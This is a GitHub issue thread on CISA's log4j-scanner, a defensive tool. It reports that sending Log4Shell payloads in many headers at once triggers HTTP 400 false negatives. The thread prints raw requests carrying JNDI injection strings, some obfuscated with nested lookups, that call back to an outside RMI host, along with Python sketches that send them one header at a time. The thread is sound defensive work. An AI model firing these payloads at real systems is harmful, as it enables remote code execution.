cisagov / log4j-scanner

log4j-scanner is a project derived from work by other members of the open-source community, maintained by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

headers.txt and headers-large.txt cause false negatives #10

Closed: GO0dspeed closed this issue 2 years ago

GO0dspeed commented 2 years ago

🐛 Summary

When log4j-scanner.py is run with headers.txt or headers-large.txt, some servers respond with HTTP 400 Bad Request, so the payloads never call back even on otherwise vulnerable servers.

To reproduce

Steps to reproduce the behavior:

  1. Begin a tcpdump or Wireshark packet capture
  2. Run log4j-scanner.py against a known vulnerable host
  3. If results are negative, inspect the PCAP for HTTP 400 Bad Request errors
  4. Rerun log4j-scanner.py with a limited headers.txt (tested with 6 headers, including Referer); a standalone version of this trimmed test is sketched after this list
  5. Callback should now work; the PCAP reflects 200 OK on the HTTP requests
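
For reference, a minimal standalone version of the trimmed test might look like this; the target URL, callback host, and header list below are placeholders, not values from the project:

```python
# Hypothetical reproduction sketch (not project code): compare sending the
# payload in many headers at once vs. one header per request.
import requests

TARGET = "http://target.example:8081/"                 # placeholder target
PAYLOAD = "${jndi:rmi://callback.example:25008/test}"  # placeholder callback

HEADER_NAMES = ["User-Agent", "Referer", "X-Api-Version",
                "Accept-Charset", "Accept-Datetime", "Accept-Encoding"]

# All payload headers in one request, mirroring headers.txt behavior;
# strict servers reject this with HTTP 400 and the payload is never parsed.
bulk = requests.get(TARGET, headers={h: PAYLOAD for h in HEADER_NAMES},
                    timeout=5)
print("all-at-once:", bulk.status_code)

# One payload header per request (the trimmed test); each request stays
# small enough that the server returns 200 and the payload can be parsed.
for name in HEADER_NAMES:
    resp = requests.get(TARGET, headers={name: PAYLOAD}, timeout=5)
    print(name, "->", resp.status_code)
```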

Expected behavior

Callbacks fire against vulnerable hosts.

Any helpful log output or screenshots

Bad request (all payload headers sent at once):

GET / HTTP/1.1
Host: <redacted>:8081
User-Agent: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept-Encoding: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept: */*
Connection: keep-alive
Referer: https://${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
X-Api-Version: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept-Charset: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept-Datetime: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
..snip
HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=iso-8859-1
Content-Length: 54
Connection: close

<h1>Bad Message 400</h1><pre>reason: Bad Request</pre>

Trimmed request with a single payload header succeeds and generates a callback:

GET /oauth?state=%2F HTTP/1.1
Host: <redacted>:8081
User-Agent: ${jndi:rmi://<redacted>:25008/vulnerable}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

HTTP/1.1 200 OK
GO0dspeed commented 2 years ago

Updating the code to loop through the headers in the scan_url function, sending one header at a time instead of all headers at once, could help with this issue, although it will increase scan time.
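
A rough sketch of what that per-header loop could look like; the function name, arguments, and output here are illustrative, not the scanner's actual scan_url code:

```python
# Illustrative sketch (assumed shape, not the project's scan_url): send one
# payload header per request so a strict server's 400 on the combined
# request no longer masks an otherwise vulnerable endpoint.
import requests

def scan_url_per_header(url, payload_headers, timeout=5):
    session = requests.Session()
    for name, value in payload_headers.items():
        try:
            resp = session.get(url, headers={name: value}, timeout=timeout)
        except requests.RequestException as exc:
            print(f"[!] {url}: request with {name} failed: {exc}")
            continue
        # A 400 here means the server rejected even a single payload
        # header; any other status means the header was at least parsed.
        if resp.status_code == 400:
            print(f"[!] {url}: header {name} rejected (HTTP 400)")
```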

genericcontributor commented 2 years ago

@GO0dspeed Thanks for the reminder. I've updated the README to note the possibility of false negatives.

We are tossing that idea around right now: potentially adding a flag to submit the headers one at a time, with a BIG disclaimer that it will increase the time complexity to O(n^2) and could take significantly longer given a large list of URLs + headers.
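
If that flag materializes, the CLI wiring might look roughly like this; the flag name and help text are hypothetical, not committed code:

```python
# Hypothetical CLI sketch (flag name is illustrative): opt in to per-header
# requests, with the time-cost warning surfaced in the help text.
import argparse

parser = argparse.ArgumentParser(description="log4j scanner (sketch)")
parser.add_argument(
    "--one-header-per-request",
    action="store_true",
    help=("Send each payload header in its own request to avoid HTTP 400 "
          "false negatives. WARNING: request count grows to "
          "len(urls) * len(headers), so large lists scan much slower."),
)
args = parser.parse_args()

if args.one_header_per_request:
    print("[*] per-header mode enabled: expect a significantly longer scan")
```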